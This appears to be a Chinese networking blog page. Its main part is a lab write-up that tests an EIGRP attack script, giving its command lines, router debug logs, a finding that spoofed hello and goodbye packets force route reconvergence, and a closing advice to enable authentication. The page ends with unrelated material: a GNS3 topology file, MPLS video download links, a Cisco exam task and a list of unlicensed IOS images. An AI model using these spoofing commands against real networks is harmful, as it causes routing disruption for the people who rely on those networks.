Feb 1 07:02:45.840: DUAL: linkdown: start – 192.168.1.249 via FastEthernet0/0
Feb 1 07:02:45.848: DUAL: Destination 192.168.0.0/16
Feb 1 07:02:45.848: DUAL: Destination 172.16.0.0/16
Feb 1 07:02:45.848: DUAL: Find FS for dest 172.16.0.0/16. FD is 307200, RD is 307200
Feb 1 07:02:45.848: DUAL: 192.168.1.249 metric 4294967295/4294967295 not found Dmin is 4294967295
Feb 1 07:02:45.848: DUAL: Peer total 0 stub 0 template 0
Feb 1 07:02:45.848: DUAL: Dest 172.16.0.0/16 (No peers) not entering active state.
Feb 1 07:02:45.852: DUAL: Removing dest 172.16.0.0/16, nexthop 192.168.1.249, infosource 192.168.1.249
Feb 1 07:02:45.856: DUAL: No routes. Flushing dest 172.16.0.0/16
Feb 1 07:02:45.864: DUAL: linkdown: finish
……后面就开始重新协商
那么接下来R1在干什么?
R1
Feb 1 07:02:46.062: Inteface goodbye received
Feb 1 07:02:46.062: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor192.168.1.251 (FastEthernet0/0) is down: Interface Goodbye received
Feb 1 07:02:46.062: DUAL: linkdown: start – 192.168.1.251 via FastEthernet0/0
Feb 1 07:02:46.062: DUAL: Destination 192.168.0.0/16
Feb 1 07:02:46.062: DUAL: Destination 172.16.0.0/16
Feb 1 07:02:46.062: DUAL: Destination 172.16.0.0/24
Feb 1 07:02:46.066: DUAL: linkdown: finish
……后面就开始重新协商
看起来好像是R1收到了R0的goodbye了,抓包为证:
果不其然。
4、分析:
目前为止看起来,应当是R0也就是251在收到一条249->251的hello信息后,直接判断为目标down,理由是Remote peer static/dynamic,随后马上中止了路由选择;紧接着向R0发送goodbye,迫使R1也终止了路由选择。
由于小家子气的cisco没有公布eigrp的细节,我们不得而知究竟eigrp对对端稳定性的判断标准是什么,但是可以肯定的是,这个脚本是通过仅仅这么一个数据包引起了eigrp的重新收敛。
这时有人会提出问题了,你怎么就知道是249->251的这个数据包而非249->249这个数据包引发的致瘫呢?因为也有可能是R0收到249->249的包,虽然报告了ignored,但是已经触发了不正常的数据,而导致R1做出了目标down的判断?
我也有一样的疑问,所幸的是,这个攻击脚本具备一个说明里没提到的参数,就是指定网络范围,我们下面将攻击起始地址往上抬,从250开始,这样就不会发出249的包,也就可以验证问题了。
./eigrp.pl –hellodos 192.168.1.250 –source 192.168.1.249
现象一摸一样。我们将debug信息完整贴上:
R0
Feb 1 07:32:18.353: IP: s=192.168.1.249 (FastEthernet0/0), d=224.0.0.10, len 60, rcvd 2
Feb 1 07:32:18.365: EIGRP: Received HELLO . FastEthernet0/0 nbr 192.168.1.249
Feb 1 07:32:18.369: AS 1, Flags 0×0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0
Feb 1 07:32:18.509: IP: tableid=0, s=192.168.1.249 (FastEthernet0/0), d=192.168.1.251 (FastEthernet0/0), routed via RIB
Feb 1 07:32:18.513: IP: s=192.168.1.249 (FastEthernet0/0), d=192.168.1.251 (FastEthernet0/0), len 60, rcvd 3
Feb 1 07:32:18.525: EIGRP: Received HELLO . FastEthernet0/0 nbr 192.168.1.249
Feb 1 07:32:18.529: AS 1, Flags 0×0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0
Feb 1 07:32:18.533: IP: s=192.168.1.251 (local), d=224.0.0.10 (FastEthernet0/0), len 60, sending broad/multicast
Feb 1 07:32:18.537: EIGRP: Sending HELLO . FastEthernet0/0
Feb 1 07:32:18.541: AS 1, Flags 0×0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0
Feb 1 07:32:18.541: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor192.168.1.249 (FastEthernet0/0) is down: Remote peer static/dynamic
Feb 1 07:32:18.545: DUAL: linkdown: start – 192.168.1.249 via FastEthernet0/0
Feb 1 07:32:18.553: DUAL: Destination 192.168.0.0/16
Feb 1 07:32:18.561: DUAL: Destination 172.16.0.0/16
Feb 1 07:32:18.561: DUAL: Find FS for dest 172.16.0.0/16. FD is 307200, RD is 307200
Feb 1 07:32:18.565: DUAL: 192.168.1.249 metric 4294967295/4294967295 not found Dmin is 4294967295
Feb 1 07:32:18.569: DUAL: Peer total 0 stub 0 template 0
Feb 1 07:32:18.569: DUAL: Dest 172.16.0.0/16 (No peers) not entering active state.
Feb 1 07:32:18.573: DUAL: Removing dest 172.16.0.0/16, nexthop 192.168.1.249, infosource 192.168.1.249
Feb 1 07:32:18.577: DUAL: No routes. Flushing dest 172.16.0.0/16
Feb 1 07:32:18.585: DUAL: linkdown: finish
R1
Feb 1 07:32:18.393: IP: s=192.168.1.249 (local), d=224.0.0.10 (FastEthernet0/0), len 60, sending broad/multicast
Feb 1 07:32:18.397: EIGRP: Sending HELLO . FastEthernet0/0
Feb 1 07:32:18.401: AS 1, Flags 0×0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0
Feb 1 07:32:18.917: IP: s=192.168.1.251 (FastEthernet0/0), d=224.0.0.10, len 60, rcvd 2
Feb 1 07:32:18.925: EIGRP: Received HELLO . FastEthernet0/0 nbr 192.168.1.251
Feb 1 07:32:18.925: AS 1, Flags 0×0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0
Feb 1 07:32:18.925: Inteface goodbye received
Feb 1 07:32:18.925: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor192.168.1.251 (FastEthernet0/0) is down: Interface Goodbye received
Feb 1 07:32:18.925: DUAL: linkdown: start – 192.168.1.251 via FastEthernet0/0
Feb 1 07:32:18.925: DUAL: Destination 192.168.0.0/16
Feb 1 07:32:18.925: DUAL: Destination 172.16.0.0/16
Feb 1 07:32:18.925: DUAL: Destination 172.16.0.0/24
Feb 1 07:32:18.925: DUAL: linkdown: finish
然而目前我们的判断是背后真正的原因么??
五、攻击eigrp方式二1、现在我们来尝试这个脚本的第二个参数,ipgoodbye;
./eigrp.pl –ipgoodbye 192.168.1.251 –source 192.168.1.249
嗯?路由器没反应?
这个脚本发出的包貌似有问题;我们来看看:
2、原来是opcaode的值不对,我们来修改下opcode的值。(水煮豆豆注:opcode意为Operation code indicating the message type: 1 Update. 2Reserved. 3 Query. 4 Hello. 5IPX-SAP,这里不知道为什么和现实中得到的不一致,网上很多人抓eigrp包时,opcode为5也是hello的包)
./eigrp.pl –ipgoodbye 192.168.1.251 –source 192.168.1.249 –opcode=5
成功了,又开始重新收敛了,赶紧看看数据:
很好,没有出现unknown。注意哦,现在脚本发出来的包符合组播的地址了,不再是单播指向251的哦!这里看看里面有什么:
和正常的hello包相比,仅仅是屁股后面多了一截,然后IOS的版本不一致(这里有点奇怪,我在配置文件里已经改成12.4,且在攻击方法一里测试发出的包也是12.4的,这里却怎么都是12.3,看来这里发出的数据并没有读取配置文件中的值);看看两个路由器都反应了什么信息:
R0
Feb 1 08:10:28.298: EIGRP: Received Goodbye TLV from 192.168.1.249
Feb 1 08:10:28.298: 192.168.1.251
Feb 1 08:10:28.302: address matched
Feb 1 08:10:28.302: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.249 (FastEthernet0/0) is down: Peer goodbye received
Feb 1 08:10:28.306: DUAL: linkdown: start – 192.168.1.249 via FastEthernet0/0
Feb 1 08:10:28.314: DUAL: Destination 192.168.0.0/16
Feb 1 08:10:28.318: DUAL: Destination 172.16.0.0/16
Feb 1 08:10:28.322: DUAL: Find FS for dest 172.16.0.0/16. FD is 307200, RD is 307200
Feb 1 08:10:28.322: DUAL: 192.168.1.249 metric 4294967295/4294967295 not found Dmin is 4294967295
Feb 1 08:10:28.326: DUAL: Peer total 0 stub 0 template 0
Feb 1 08:10:28.330: DUAL: Dest 172.16.0.0/16 (No peers) not entering active state.
Feb 1 08:10:28.334: DUAL: Removing dest 172.16.0.0/16, nexthop 192.168.1.249, infosource 192.168.1.249
Feb 1 08:10:28.338: DUAL: No routes. Flushing dest 172.16.0.0/16
Feb 1 08:10:28.338: DUAL: linkdown: finish
(R0收到了Goodbye包,并识别同时配合关闭路由选择)
R1
Feb 1 08:10:28.264: IP: s=192.168.1.249 (FastEthernet0/0), d=224.0.0.10, len 69, rcvd 2
Feb 1 08:10:28.272: EIGRP: Received HELLO . FastEthernet0/0 nbr 192.168.1.249
Feb 1 08:10:28.276: AS 1, Flags 0×0, Seq 0/0 idbQ 0/0
Feb 1 08:10:28.276: EIGRP: Packet from ourselves ignored
(R1也收到了Goodbye包,忽略)
……
Feb 1 08:10:32.907: IP: tableid=0, s=192.168.1.251 (FastEthernet0/0), d=192.168.1.249 (FastEthernet0/0), routed via RIB
Feb 1 08:10:32.907: IP: s=192.168.1.251 (FastEthernet0/0), d=192.168.1.249 (FastEthernet0/0), len 40, rcvd 3
Feb 1 08:10:32.915: IP: s=192.168.1.251 (FastEthernet0/0), d=224.0.0.10, len 60, rcvd 2
Feb 1 08:10:32.915: IP: s=192.168.1.251 (FastEthernet0/0), d=224.0.0.10, len 77, rcvd 2
Feb 1 08:10:32.919: IP: s=192.168.1.251 (FastEthernet0/0), d=224.0.0.10, len 40, rcvd 2
Feb 1 08:10:32.931: EIGRP: Received UPDATE . FastEthernet0/0 nbr 192.168.1.251
Feb 1 08:10:32.935: AS 1, Flags 0×1, Seq 45/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0
Feb 1 08:10:32.939: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.251 (FastEthernet0/0) is down: peer restarted
Feb 1 08:10:32.943: DUAL: linkdown: start – 192.168.1.251 via FastEthernet0/0
Feb 1 08:10:32.951: DUAL: Destination 192.168.0.0/16
Feb 1 08:10:32.951: DUAL: Destination 172.16.0.0/16
Feb 1 08:10:32.951: DUAL: Destination 172.16.0.0/24
Feb 1 08:10:32.955: DUAL: linkdown: finish
(R1收到R0的更新,得知已经关闭路由选择,因此自己也关闭了)
3、推论。这个脚本的ipgoodbye参数确实让R0以为收到了goodbye信息,从而引发了路由收敛,但是我们很明显的看到,和方法一的报错不一样,前面是因为地址的动态变化,而这次是因为收到了确定的goodbye信息,问题在于这个goodbye包并不是权值255的包,一样做了有效的处理。
为了验证这一点,我们需要进一步修改实验拓扑,测试如何在不使用脚本的情况下触发更新。
六、修改拓扑验证能否触发和攻击脚本一样的现象拓扑修改如下:
我们插入R3的目的是分别在R3的f0/0上启用248、249地址,测试在接口打开和关闭时对R0的影响,通过分析现象确认是否和攻击脚本一致。
1、192.168.1.248进网。模拟一个正常的邻居下线时的状态。
启动R3的f0/0接口,这个就不比说了,只是多了个邻居的协商,并通告新的网络和路由,不会触发goodbye,这里就不演示了。
关闭R3的f0/0接口。
R3#clear ip eigrp 1 neighbors
抓包看看:
R3发出的是一个标准的K值全部是255的goodbye包。
观察另外两个路由器的现象:
R0
Feb 1 08:56:22.286: IP: s=192.168.1.248 (FastEthernet0/0), d=224.0.0.10, len 60, rcvd 2
Feb 1 08:56:22.294: EIGRP: Received HELLO . FastEthernet0/0 nbr 192.168.1.248
Feb 1 08:56:22.298: AS 1, Flags 0×0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0
Feb 1 08:56:22.298: Inteface goodbye received
Feb 1 08:56:22.298: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor192.168.1.248 (FastEthernet0/0) is down: Interface Goodbye received
Feb 1 08:56:22.298: DUAL: linkdown: start – 192.168.1.248 via FastEthernet0/0
Feb 1 08:56:22.298: DUAL: Destination 192.168.0.0/16
Feb 1 08:56:22.302: DUAL: Destination 172.16.0.0/16
Feb 1 08:56:22.306: DUAL: linkdown: finish
R1
Feb 1 08:56:22.233: EIGRP: Received HELLO . FastEthernet0/0 nbr 192.168.1.248
Feb 1 08:56:22.237: AS 1, Flags 0×0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0
Feb 1 08:56:22.241: Inteface goodbye received
Feb 1 08:56:22.241: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor192.168.1.248 (FastEthernet0/0) is down: Interface Goodbye received
Feb 1 08:56:22.245: DUAL: linkdown: start – 192.168.1.248 via FastEthernet0/0
Feb 1 08:56:22.253: DUAL: Destination 192.168.0.0/16
Feb 1 08:56:22.257: DUAL: Destination 172.16.0.0/16
Feb 1 08:56:22.261: DUAL: Destination 172.16.0.0/24
Feb 1 08:56:22.265: DUAL: linkdown: finish
可以看到,两个路由器几乎在同时收到了248的goodbye,因此做了终止路由选择动作。以上过程非常符合我们对eigrp的认识。
2、192.168.1.249进网。模拟攻击方法一中网内出现不同mac地址的249时,会不会触发goodbye。
我们在R3的f0/0接口上直接修改地址:
ip add 192.168.1.249 255.255.0.0
(1)R3接口地址改变,eigrp重新计算,发送goodbye信息:
R3
.Feb 2 00:18:02.474: IP: s=192.168.1.249 (local), d=224.0.0.10 (FastEthernet0/0), len 60, sending broad/multicast
.Feb 2 00:18:02.478: EIGRP: Sending HELLO . FastEthernet0/0
.Feb 2 00:18:02.482: AS 1, Flags 0×0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0
(指令生效,R3已经把249当成自己的local,向外组播)
其实根据mac地址确定,这个包时R3已经向外发送goodbye信息。
(2)R0本来向R1路由的172.16失去目标(由于被假的249顶替),发出查询数据:
R3收到查询信息,并再次发出goodbye信息:
R3
.Feb 2 00:18:02.510: DUAL: rcvupdate: 192.168.0.0/16 via Connected metric 4294967295/4294967295
.Feb 2 00:18:02.514: DUAL: Find FS for dest 192.168.0.0/16. FD is 281600, RD is 281600
.Feb 2 00:18:02.518: DUAL: 0.0.0.0 metric 4294967295/4294967295 not found Dmin is 4294967295
.Feb 2 00:18:02.518: DUAL: Peer total 2 stub 0 template 0
.Feb 2 00:18:02.522: DUAL: Dest 192.168.0.0/16 (No peers) not entering active state.
.Feb 2 00:18:02.526: DUAL: Removing dest 192.168.0.0/16, nexthop 0.0.0.0, infosource 0.0.0.0
.Feb 2 00:18:02.530: DUAL: No routes. Flushing dest 192.168.0.0/16
.Feb 2 00:18:02.534: IP: s=192.168.1.249 (local), d=224.0.0.10 (FastEthernet0/0), len 60, sending broad/multicast
.Feb 2 00:18:02.538: EIGRP: Sending HELLO . FastEthernet0/0
(3)R0终于明白过来,也开始进入down程序:
R0
Feb 2 00:18:02.534: IP: s=192.168.1.249 (FastEthernet0/0), d=224.0.0.10, len 60, rcvd 2
Feb 2 00:18:02.542: EIGRP: Received HELLO . FastEthernet0/0 nbr 192.168.1.249
Feb 2 00:18:02.546: AS 1, Flags 0×0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0
Feb 2 00:18:02.550: Inteface goodbye received
Feb 2 00:18:02.550: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor192.168.1.249 (FastEthernet0/0) is down: Interface Goodbye received
Feb 2 00:18:02.554: DUAL: linkdown: start – 192.168.1.249 via FastEthernet0/0
Feb 2 00:18:02.562: DUAL: Destination 192.168.0.0/16
Feb 2 00:18:02.566: DUAL: Destination 172.16.0.0/16
Feb 2 00:18:02.570: DUAL: Find FS for dest 172.16.0.0/16. FD is 307200, RD is 307200
Feb 2 00:18:02.574: DUAL: 192.168.1.249 metric 4294967295/4294967295 not found Dmin is 4294967295
Feb 2 00:18:02.574: DUAL: Peer total 1 stub 0 template 1
Feb 2 00:18:02.578: DUAL: Dest 172.16.0.0/16 entering active state.
Feb 2 00:18:02.582: DUAL: Set reply-status table. Count is 1.
Feb 2 00:18:02.582: DUAL: Not doing split horizon
Feb 2 00:18:02.586: DUAL: linkdown: finish
(4)与此同时,R1也收到了假249的包和R0的查询包,一直做忽略和更新通告处理:
R1
Feb 2 00:18:02.595: EIGRP: Received HELLO . FastEthernet0/0 nbr 192.168.1.249
Feb 2 00:18:02.599: AS 1, Flags 0×0, Seq 0/0 idbQ 0/0
Feb 2 00:18:02.599: EIGRP: Packet from ourselves ignored
Feb 2 00:18:02.667: IP: s=192.168.1.251 (FastEthernet0/0), d=224.0.0.10, len 67, rcvd 2
Feb 2 00:18:02.671: EIGRP: Received QUERY . FastEthernet0/0 nbr 192.168.1.251
Feb 2 00:18:02.671: AS 1, Flags 0×0, Seq 111/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0
Feb 2 00:18:02.671: EIGRP: Enqueueing ACK . FastEthernet0/0 nbr 192.168.1.251
Feb 2 00:18:02.671: Ack seq 111 iidbQ un/rely 0/0 peerQ un/rely 1/0
Feb 2 00:18:02.671: IP-EIGRP(Default-IP-Routing-Table:1): Processing incoming QUERY packet
Feb 2 00:18:02.671: IP-EIGRP(Default-IP-Routing-Table:1): Int 172.16.0.0/16M 4294967295 – 256000 4294967295 SM 4294967295 – 256000 4294967295
Feb 2 00:18:02.675: DUAL: dest(172.16.0.0/16) not active
Feb 2 00:18:02.675: DUAL: rcvquery: 172.16.0.0/16 via 192.168.1.251 metric 4294967295/4294967295, RD is 281600
Feb 2 00:18:02.679: DUAL: send REPLY(r1/n1) about 172.16.0.0/16 to 192.168.1.251
Feb 2 00:18:02.683: IP: s=192.168.1.249 (local), d=192.168.1.251 (FastEthernet0/0), len 40, sending
Feb 2 00:18:02.687: EIGRP: Sending ACK . FastEthernet0/0 nbr 192.168.1.251
Feb 2 00:18:02.691: AS 1, Flags 0×0, Seq 0/111 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 1/0
Feb 2 00:18:02.695: EIGRP: Enqueueing REPLY . FastEthernet0/0 nbr 192.168.1.251 iidbQ un/rely 0/1 peerQ un/rely 0/0 serno 7-7
Feb 2 00:18:02.699: EIGRP: Requeued unicast . FastEthernet0/0
Feb 2 00:18:02.703: EIGRP: Forcing multicast xmit . FastEthernet0/0
Feb 2 00:18:02.703: IP-EIGRP(Default-IP-Routing-Table:1): 172.16.0.0/16 – do advertise out FastEthernet0/0
Feb 2 00:18:02.707: IP-EIGRP(Default-IP-Routing-Table:1): Int 172.16.0.0/16 metric 281600 – 256000 25600
Feb 2 00:18:02.707: IP: s=192.168.1.249 (local), d=192.168.1.251 (FastEthernet0/0), len 67, sending
Feb 2 00:18:02.707: EIGRP: Sending REPLY . FastEthernet0/0 nbr 192.168.1.251
Feb 2 00:18:02.707: AS 1, Flags 0×0, Seq 65/111 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/1 serno 7-7
Feb 2 00:18:02.711: IP: s=192.168.1.249 (FastEthernet0/0), d=224.0.0.10, len 60, rcvd 2
Feb 2 00:18:02.719: EIGRP: Received HELLO . FastEthernet0/0 nbr 192.168.1.249
Feb 2 00:18:02.723: AS 1, Flags 0×0, Seq 0/0 idbQ 0/0
Feb 2 00:18:02.727: EIGRP: Packet from ourselves ignored
Feb 2 00:18:02.767: IP: s=192.168.1.249 (FastEthernet0/0), d=224.0.0.10, len 60, rcvd 2
Feb 2 00:18:02.775: EIGRP: Received HELLO . FastEthernet0/0 nbr 192.168.1.249
Feb 2 00:18:02.779: AS 1, Flags 0×0, Seq 0/0 idbQ 0/0
Feb 2 00:18:02.779: EIGRP: Packet from ourselves ignored
(5)随后三者的状态:
R0
Feb 2 00:55:37.910: IP: s=192.168.1.249 (FastEthernet0/0), d=192.168.1.251 (FastEthernet0/0), len 40, rcvd 3
Feb 2 00:55:37.918: EIGRP: Received UPDATE . FastEthernet0/0 nbr 192.168.1.249
Feb 2 00:55:37.922: AS 1, Flags 0×1, Seq 72/136 idbQ 0/0 iidbQ un/rely0/0 peerQ un/rely 0/0, last received seq 72, out of sequence, this seq72
R0不断的收到起死回生后的R3的更新,但是由于真假249的交错数据,R0发现序列号不对,不断丢弃更新,从而始终在反复重启eigrp状态。
R1和R3则不断的发送hello更新,企图争先和R0建立邻居关系。
这样,网内的路由不断翻滚,并伴随路由器报出IP地址重叠的消息。
归根结底,通过修改路由拓扑的方法并不能重现攻击时的状态,这次R0明显的报告出了数据包序列号不同步等方面的问题,而非地址动态等毛病。
七、总结这次的实验中我们设计了几个环节:
1、eigrp恶意路由的插入;这个没有悬念,非常顺利。
2、eigrp的hellodos攻击,这个我们认识到了不是真正的dos,而是在eigrp收到一个构造的包,包的源是已经形成邻接关系的邻居,目的不是224.0.0.10而是自身eigrp进程接口地址时,会触发本机发出goodbye,同时报告地址动态/静态变化。
3、eigrp的ipgoodbye攻击,这个我们也发现了并非全255的值,但是后面跟上了一段攻击脚本自身的数据,同样引发了被攻击设备识别为goodbye的现象。
4、最后我们自己修改环境,模拟网内插入一个同样地址的设备,发现现象又和上述情况不同,新插入的设备和被攻击路由器交互,被攻击路由器收到两个相同设备的数据而困扰,处于丢弃状态,而另外真假两个路由器则不断的试图联系和更新对端。
认识:
1、此攻击脚本有很多忽悠的成分,说是dos其实根本不是,说ipgoodbye其实组包格式不对;其他参数由于和攻击无关还未一一测试。
2、eigrp在算法上有很多值得深入研究的,目前认识还比较浅薄,尤其在什么情况下触发goodbye在本次实验中并未达成共识。
3、本次实验的几种现象都是攻击者较为容易模拟的现象,证明eigrp在某些情况下存在容易引发路由翻滚的弊端。
建议:
1、严格匹配邻居关系,锁定IP地址,合理规划网内eigrp布局。
2、打开认证,不要怕麻烦,安全在于意识。尤其在局域网速率飞速上涨的今天,一点加解密算法不会对网络和设备荷载造成很大的影响。
3、加强管理,随时关注网内数据。
CCNP_BSCI的Net和TOP图
autostart = False
[localhost:7202]
workingdir = E:\Dynamips\bsci_working
udp = 10200
[[3640]]
image = E:\Dynamips\ios\Unzip\unzip-c3640-ik9o3s-mz.124-10.bin
idlepc = 0×605c95b4
ghostios = True
chassis = 3640
[[ROUTER P2R4]]
model = 3640
console = 2015
slot0 = NM-4T
s0/0 = P2R3 s0/0
slot1 = NM-1FE-TX
f1/0 = P2R2 f1/0
x = 272.0
y = 203.0
hx = -2.0
hy = -20.0
[[ROUTER P2R3]]
model = 3640
console = 2019
slot0 = NM-4T
s0/0 = P2R4 s0/0
slot1 = NM-1FE-TX
f1/0 = P2R1 f1/0
x = 83.0
y = 207.0
[[ROUTER P2R1]]
model = 3640
console = 2020
slot0 = NM-4T
s0/0 = FR s1/2
s0/1 = P2R2 s0/1
slot1 = NM-1FE-TX
f1/0 = P2R3 f1/0
x = 87.0
y = 70.0
[[ROUTER P2R2]]
model = 3640
console = 2021
slot0 = NM-4T
s0/0 = FR s1/3
s0/1 = P2R1 s0/1
slot1 = NM-1FE-TX
f1/0 = P2R4 f1/0
x = 266.0
y = 70.0
[localhost:7200]
workingdir = E:\Dynamips\bsci_working
udp = 10000
[[3640]]
image = E:\Dynamips\ios\Unzip\unzip-c3640-ik9o3s-mz.124-10.bin
idlepc = 0×605c95b4
ghostios = True
chassis = 3640
[[ROUTER R4]]
model = 3640
console = 2013
slot0 = NM-1FE-TX
f0/0 = SW0 3
x = -4.0
y = -121.0
hx = 40.0
hy = -21.0
[[ROUTER FR]]
model = 3640
console = 2017
slot0 = NM-4T
s0/0 = BBR2 s0/0
s0/1 = BBR1 s0/0
slot1 = NM-4T
s1/0 = P1R1 s0/0
s1/1 = P1R2 s0/0
s1/2 = P2R1 s0/0
s1/3 = P2R2 s0/0
symbol = Frame_Relay(ROUTE)
x = 6.5
y = -49.5
[[ROUTER BBR2]]
model = 3640
console = 2024
slot0 = NM-4T
s0/0 = FR s0/0
slot1 = NM-1FE-TX
f1/0 = SW0 1
x = -252.0
y = -202.0
[[ETHSW SW0]]
1 = access 1
2 = access 1
3 = access 1
x = -6.5
y = -195.0
[[ROUTER BBR1]]
model = 3640
console = 2014
slot0 = NM-4T
s0/0 = FR s0/1
slot1 = NM-1FE-TX
f1/0 = SW0 2
x = 201.0
y = -201.0
[localhost:7201]
workingdir = E:\Dynamips\bsci_working
udp = 10100
[[3640]]
image = E:\Dynamips\ios\Unzip\unzip-c3640-ik9o3s-mz.124-10.bin
idlepc = 0×605c95b4
ghostios = True
chassis = 3640
[[ROUTER P1R3]]
model = 3640
console = 2023
slot0 = NM-4T
s0/0 = P1R4 s0/0
slot1 = NM-1FE-TX
f1/0 = P1R1 f1/0
x = -282.0
y = 208.0
hx = -7.0
hy = -24.0
[[ROUTER P1R2]]
model = 3640
console = 2022
slot0 = NM-4T
s0/0 = FR s1/1
s0/1 = P1R1 s0/1
slot1 = NM-1FE-TX
f1/0 = P1R4 f1/0
x = -123.0
y = 68.0
[[ROUTER P1R4]]
model = 3640
console = 2018
slot0 = NM-4T
s0/0 = P1R3 s0/0
slot1 = NM-1FE-TX
f1/0 = P1R2 f1/0
x = -119.0
y = 207.0
[[ROUTER P1R1]]
model = 3640
console = 2016
slot0 = NM-4T
s0/0 = FR s1/0
s0/1 = P1R2 s0/1
slot1 = NM-1FE-TX
f1/0 = P1R3 f1/0
x = -278.0
y = 65.0
[GNS3-DATA]
workdir = bsci_working
[[Cloud TFTP]]
symbol = computer
x = -5.5
y = -296.5
WOLF老余的mpls 00-18(最新更新完毕)2009
mpls-00-mpls-basic-143min.wmv
http://d.namipan.com/d/82d4ce62e6446179d3eab631166790ac033cfec5cc1b4909
mpls-01-mpls-basic-label-protocol-81min.wmv
http://d.namipan.com/d/ea2084311d6493b6e0a375d7eac98dd6440467ccb8fd1c05
mpls-02-mpls-advanced-feature-124min.wmv
http://d.namipan.com/d/2a5b923d7ea4f9ed2c9de3fdf65bc2c35807c382e0b33c06
mpls-03-mpls-summary-and-vpn-introduction-136min.wmv
http://d.namipan.com/d/e82ead13f331d2fda7a0f46d643edb541659d502eec9f706
mpls-04-mpls-vpn-deployment-pe-ce-protocol-154min.wmv
http://d.namipan.com/d/14138e252336e2b1ad1fcbf93ea0b99b2dd696382eeaa608
mpls-05-mpls-vpn-deployment-topology-42min.wmv
http://d.namipan.com/d/bb7a5a5466b56d87f9e0c81ff0b27a9aebd77b497020d002
mpls-06-mpls-vpn-internet-access-98min.wmv
http://d.namipan.com/d/67cbfe26c1ab98cb3f23bd2e6901e4858e9366dc16130304
mpls-07-mpls-vpn-internet-access-58min.wmv
http://d.namipan.com/d/c00b5d581d39e59807a06bb4e76d945f379add6ae816dc02
mpls-08-mpls-vpn-inter-as-105min.wmv
http://d.namipan.com/d/a4eea6f8545388a892ce57f3d8b55251127382a5349d8705
mpls-09-mpls-vpn-inter-as-69min.wmv
http://d.namipan.com/d/d83636dcc8c824a244ee34564f7c77375ec980720e741b03
mpls-10-mpls-vpn-inter-as-64min.wmv
http://d.namipan.com/d/54234d84e8215a777a24986ee899430ea4470ec9e0fcb303
mpls-11-mpls-vpn-csc-59min.wmv
http://d.namipan.com/d/ca02949d9e3c9ec40e3566b4387f67d62b575e23e8a94b04
mpls-12-npls-vpn-csc-144min.wmv
http://d.namipan.com/d/e4ec9c374c1156d1a12b102bfd9523b76cd82bd21858b908
mpls-13-mpls-te-theory-175min.wmv
http://d.namipan.com/d/4048488a9b49a29c3c296917e4a7051c6ddb68edbc76ae07
mpls-14-mpls-te-configuration-117min.wmv
http://d.namipan.com/d/cc888488c87cb65e537640ebe2f25502d4aa2d691a67b205
mpls-15-mpls-te-optimization-107min.wmv
http://d.namipan.com/d/9a8c9c1ff7c19bbc7333b7e2348ebd68232d761264d16206
mpls-16-mpls-te-frr-qos-vpn-130min.wmv
http://d.namipan.com/d/4c1b5f014195a75b348945cd393a603d1db34e6192843106
mpls-17-multicast-vpn-1-164min.wmv
http://d.namipan.com/d/f6821a2091a5b0cff5005c9a30e124088b0c541eb0ba3a07
mpls-18-multicast-vpn-2-71min.wmv
http://d.namipan.com/d/0029dca825d4b07cc7110055437eb5bfad0e6f3d04a92303
CCNP BSCI ospf/bgp/eigrp/更新过滤
————————————————————————————————————————————–
Instructions
Configure the routers according to the above diagram and the requirements
below.
Requirements
• Configure the interfaces with the IP addresses shown in the diagram.
• Configure R2 and R3 to be in EIGRP AS 65100. Add the entire class B network
and disable automatic summarization.
2 – 2 CCNP: Building Scalable Internetworks v5.0 – Skills-Based Assessment 2 Copyright © 2006, Cisco Systems, Inc
• Configure OSPF area 0 on the link between R1 and R2. Also add the loopback
interfaces on R1 into area 0.
• Have R3 redistribute its connected routes into EIGRP.
• Make sure all loopback interfaces are advertised with the correct mask.
• Have R2 originate a default route into the OSPF domain.
• Redistribute OSPF into EIGRP.
• Filter out 172.16.120.0 and 172.16.121.0 from being advertised to R3.
• Configure R2 and R3 in BGP AS 65100. Configure R4 in BGP AS 65400.
• Peer R2 and R3 in BGP on their loopback interfaces.
• Peer R3 and R4 in BGP.
• Have R4 advertise its loopback interfaces into BGP.
• Configure R3 to filter out 172.31.8.0 and 172.31.12.0 on the inbound updates
from R4.
• Configure R4 with a static route to the 172.16.0.0/16 network via R3.
精品思科IOS全套下载7.8G
IOS来自于互联网 版权属于CISCO 请不要作为商业用途,否则后果自负!!!
Google sites地址:http://google.ghitr.com/cisco/jing-pin-si-keios-quan-tao-xia-zai7-8g
[ad#ad_article_1]
│ │ │ c1600-sy-l_112-17_P.bin 4.02 MB
│ │ │ c1700-bk9no3r2sy7-mz.123-7.XR.bin 13.43 MB
│ │ │ c1700-ipvoice-mz.123-12.bin 11.88 MB
│ │ │ c1700-k9o3sy7-mz.123-10.bin 9.32 MB
│ │ │ c1700-k9o3sy7-mz.123-11.t.bin 12.64 MB
│ │ │ c1700-k9o3sy7-mz.123-7.T.bin 11.18 MB
│ │ │ c1700-sv3y-mz.122-4.YB.bin 7.53 MB
│ │ │ c1700-sy7-mz.123-9.bin 7.93 MB
│ │ │ c1700-y-mz.123-12.bin 5.61 MB
│ │ │ c2500-c-l.122-13.T.bin 9.44 MB
│ │ │ c2500-i-l.121-2.T.bin 7.62 MB
│ │ │ c2500-is-l.122-8.T.bin 13.22 MB
